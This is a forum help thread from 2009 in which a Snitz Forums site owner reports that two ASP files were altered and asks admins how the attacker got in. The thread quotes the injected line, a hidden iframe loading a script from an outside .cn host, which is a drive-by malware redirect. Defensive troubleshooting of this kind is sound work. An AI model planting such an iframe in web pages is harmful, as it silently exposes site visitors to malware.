Snitz Forums 2000
Snitz Forums 2000
Home | Profile | Register | Active Topics | Members | Search | FAQ
Username:
 Password:
Save Password
Forgot your Password?

 All Forums
 Help Groups for Snitz Forums 2000 Users
 Help: General / Classic ASP versions(v3.4.XX)
 Virus attacked		  New Topic  Topic Locked
 Printer Friendly
Next Page
Author Previous Topic Topic Next Topic
Page: of 2

thelodger
Junior Member

United Kingdom
296 Posts
Posted - 11 June 2009 :  10:46:03  Show Profile
Hi guys, we have had an attack, its quite a minor attack, someone added some code at the bottom of 2 files the; default.asp and default_group.asp.

Now I have no idea how anyone could have done that, no one has our FTP password or indeed details.

How can I stop this from happening again?

HuwR
Forum Admin

United Kingdom
20592 Posts
Posted - 11 June 2009 :  11:02:10  Show Profile  Visit HuwR's Homepage
without some more information, it will be very difficult to give any advice.

for a start, what version of the code are you running, what exactly was the code they added ?
Go to Top of Page

thelodger
Junior Member

United Kingdom
296 Posts
Posted - 11 June 2009 :  11:13:30  Show Profile
OK I am running the latest version of the code, when I got back in someone has added the line in red to the bottom of the 2 files above

quote:
WriteFooter
%>

<iframe src="http://lotwager.cn:8080/ts/in.cgi?pepsi57" width=125 height=125 style="visibility: hidden"></iframe>
Go to Top of Page

ruirib
Snitz Forums Admin

Portugal
26364 Posts
Posted - 11 June 2009 :  11:15:16  Show Profile  Send ruirib a Yahoo! Message
Either you have an upload mod with a hole, or your server was hacked, cause those would be the ways to actually change code files in your site.

Snitz 3.4 Readme | Like the support? Support Snitz too
Go to Top of Page

thelodger
Junior Member

United Kingdom
296 Posts
Posted - 11 June 2009 :  11:19:12  Show Profile
Cheers mate, I would guess the server was hacked, as the only upload mods I have are the avatar mod and proeders file attachment mod, both of these have been about for ages and I would guess that if a hole was in them, someone would have found it by now?
Go to Top of Page

ruirib
Snitz Forums Admin

Portugal
26364 Posts
Posted - 11 June 2009 :  11:35:46  Show Profile  Send ruirib a Yahoo! Message
Better contact the host. I wouldn't vouch on the mods, though. Just allowing certain types of files could be enough.
You can also check the server logs to see if you can find anything weird.

Snitz 3.4 Readme | Like the support? Support Snitz too
Go to Top of Page

thelodger
Junior Member

United Kingdom
296 Posts
Posted - 11 June 2009 :  12:08:32  Show Profile
Well my hosts were useless, told me I have to look at the logs, but what should I be looking for, I dont have a clue, todays log is massive as it is, for me its like looking for a pin in a haystack lol
Go to Top of Page

ruirib
Snitz Forums Admin

Portugal
26364 Posts
Posted - 11 June 2009 :  12:15:45  Show Profile  Send ruirib a Yahoo! Message
Check the date and time those forum files were changed and then check if there is some file reference in the log, near that time, that's not one of your files. You may not find a thing, as the server may have been hacked through another domain, but you can always try.

Snitz 3.4 Readme | Like the support? Support Snitz too
Go to Top of Page

HuwR
Forum Admin

United Kingdom
20592 Posts
Posted - 11 June 2009 :  12:19:03  Show Profile  Visit HuwR's Homepage
how big is the logfile if you zip it up ?
Go to Top of Page

thelodger
Junior Member

United Kingdom
296 Posts
Posted - 11 June 2009 :  12:21:53  Show Profile
Its 27.6 MB as it is
Go to Top of Page

thelodger
Junior Member

United Kingdom
296 Posts
Posted - 11 June 2009 :  12:22:59  Show Profile
I guess I could host it and put up a link?
Go to Top of Page

HuwR
Forum Admin

United Kingdom
20592 Posts
Posted - 11 June 2009 :  12:24:17  Show Profile  Visit HuwR's Homepage
is that zipped ? 27Mb is actually quite a small log file I have seen log files in the 100's of Mb if it is 27Mb uncompressed it will zip to a very small size probably only a couple of Mb, in which case, email me using the forums email sytem and I will reply so that you can send me the log file and I will take a look at it
Go to Top of Page

thelodger
Junior Member

United Kingdom
296 Posts
Posted - 11 June 2009 :  12:26:49  Show Profile
Thanks a huge bunch, email on its way.
Go to Top of Page

thelodger
Junior Member

United Kingdom
296 Posts
Posted - 11 June 2009 :  13:04:54  Show Profile
Its 1.44 MG zipped.
Go to Top of Page

thelodger
Junior Member

United Kingdom
296 Posts
Posted - 14 June 2009 :  04:50:00  Show Profile
Happend again, same 2 files, I have the time it happend this time and this is what it says in the log files


quote:
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-06-14 04:50:47
#Fields: date time s-sitename s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-substatus sc-win32-status sc-bytes cs-bytes time-taken


Now the change took place at 4:46 and 4:47 the log files seem to stop at 4:35 and start again at 4:50 with the above entry in between.
Anyone shed any light and how they are getting in?
Go to Top of Page

ruirib
Snitz Forums Admin

Portugal
26364 Posts
Posted - 14 June 2009 :  05:30:49  Show Profile  Send ruirib a Yahoo! Message
You should talk to the host. Without even log files documenting it, seems the server has some holes that are allowing it. without log files it's hard to say they are not getting in through one of your mods.

Snitz 3.4 Readme | Like the support? Support Snitz too
Go to Top of Page
Page: of 2 Previous Topic Topic Next Topic  
Next Page
 New Topic  Topic Locked
 Printer Friendly
Jump To:
Snitz Forums 2000 © 2000-2021 Snitz™ Communications Go To Top Of Page
This page was generated in 0.34 seconds. Powered By: Snitz Forums 2000 Version 3.4.07